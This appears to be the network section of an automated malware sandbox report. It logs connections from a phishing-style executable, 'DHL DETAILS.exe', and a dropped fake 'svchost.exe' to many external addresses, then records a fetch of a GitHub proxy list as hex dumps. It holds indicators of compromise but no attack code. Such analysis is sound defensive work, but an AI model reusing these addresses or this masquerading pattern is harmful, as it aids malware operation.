                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7895192.168.2.54945951.75.126.1503784756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7896192.168.2.555616111.53.178.249730243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7897192.168.2.550202163.172.94.175216176352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7898192.168.2.55580372.217.216.239414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7899192.168.2.55049951.145.176.25080806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7900192.168.2.55583316.162.211.90108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7901192.168.2.550965209.222.97.30625436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7902192.168.2.550357103.155.199.2380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7903192.168.2.55582172.195.34.352736043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7904192.168.2.557107107.175.37.1784302943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7905192.168.2.552196185.67.95.91806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7906192.168.2.556082111.53.178.249730243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7907192.168.2.551302212.110.188.202344096352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7908192.168.2.556080139.198.120.152952743220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7909192.168.2.55305551.89.173.40607756352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7910192.168.2.556031181.209.78.7599943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7911192.168.2.556478195.248.243.149723743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7912192.168.2.551355103.48.69.113826352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7913192.168.2.56145845.11.95.165501943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7914192.168.2.56531594.131.106.196312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7915192.168.2.55830872.195.34.352736043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7916192.168.2.55665172.217.216.239414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7917192.168.2.5618298.219.97.2488056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7918192.168.2.558639185.103.101.391005143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7919192.168.2.549271103.109.59.209108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7920192.168.2.563837132.148.245.1123811756176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7921192.168.2.559981187.60.219.4312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7922192.168.2.564614103.146.137.5108156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7923192.168.2.55797716.162.211.90108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7924192.168.2.56302784.47.145.189808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7925192.168.2.56122678.30.128.10808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7926192.168.2.561285198.12.255.1935161243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7927192.168.2.550033210.4.194.196806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7928192.168.2.56321791.134.140.1603089556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7929192.168.2.562056117.4.242.216567856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7930192.168.2.56256241.223.234.1163725956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7931192.168.2.56285845.11.95.165601456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7932192.168.2.565106104.250.117.48707056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7933192.168.2.555534103.48.69.1138243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7934192.168.2.56118867.205.177.1224044843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7935192.168.2.55876882.65.240.111312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7936192.168.2.5554183.73.120.104312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7937192.168.2.556479193.151.130.114808643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7938192.168.2.55160951.75.125.208481146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7939192.168.2.55037791.148.127.16280806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7940192.168.2.556045202.6.224.51108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7941192.168.2.55580378.30.128.10808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7942192.168.2.55648478.30.128.10808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7943192.168.2.561129162.214.225.2234980643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7944192.168.2.56134813.81.217.2018043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7945192.168.2.561280166.62.38.1005408343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7946192.168.2.56126191.134.140.1605649543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7947192.168.2.5611735.189.163.2108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7948192.168.2.561043117.30.118.200811843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7949192.168.2.561203181.143.11.1571021943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7950192.168.2.561401190.5.77.2118043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7951192.168.2.551273139.224.64.19180816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7952192.168.2.55582145.173.12.141199443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7953192.168.2.564795103.109.59.209108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7954192.168.2.555789171.244.140.1605374943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7955192.168.2.56495483.221.222.240312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7956192.168.2.55648291.148.127.162808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7957192.168.2.556534162.214.227.685539243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7958192.168.2.55653178.30.128.10808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7959192.168.2.55656351.79.87.1444174643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7960192.168.2.556588107.175.37.1784302943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7961192.168.2.55671665.49.38.202312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7962192.168.2.55672251.89.173.401798243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7963192.168.2.55681951.89.173.402331343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7964192.168.2.556577140.238.25.2552100043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7965192.168.2.556575221.224.44.91730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7966192.168.2.55679045.173.12.141199443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7967192.168.2.556702161.97.173.784914543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7968192.168.2.556644210.4.194.1968043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7969192.168.2.55673345.11.95.165501843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7970192.168.2.556776128.199.221.913338343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7971192.168.2.556824139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7972192.168.2.55684551.79.87.1444174643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7973192.168.2.55685551.79.87.1444174643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7974192.168.2.55661945.81.232.174705643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7975192.168.2.556621194.145.209.187312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7976192.168.2.556713153.19.91.778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7977192.168.2.55675237.187.91.1921172143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7978192.168.2.55862247.91.65.23312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7979192.168.2.556570162.241.46.66435343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7980192.168.2.55664892.204.135.376296943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7981192.168.2.556571181.78.11.21899943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7982192.168.2.55670694.23.252.168918043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7983192.168.2.556785161.35.83.251312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7984192.168.2.55682791.148.127.162808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7985192.168.2.55686937.187.73.71611343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7986192.168.2.556860132.148.245.2476034943220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7987192.168.2.55662712.186.205.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7988192.168.2.55683351.91.109.838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7989192.168.2.55679151.15.133.2141637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7990192.168.2.556685202.61.204.518043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7991192.168.2.55671137.187.73.71036243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7992192.168.2.55684342.193.58.96808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7993192.168.2.556844103.48.69.1138243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549706140.82.114.34436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:10 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                    Host: github.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-09 12:14:10 UTC506INHTTP/1.1 200 OK
                                                                                    Server: GitHub.com
                                                                                    Date: Sat, 09 Mar 2024 12:14:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                    ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3"
                                                                                    Cache-Control: max-age=0, private, must-revalidate
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                    X-Frame-Options: deny
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                    2024-03-09 12:14:10 UTC3592INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                    2024-03-09 12:14:10 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: connection: close
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                    Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                    Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                    Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
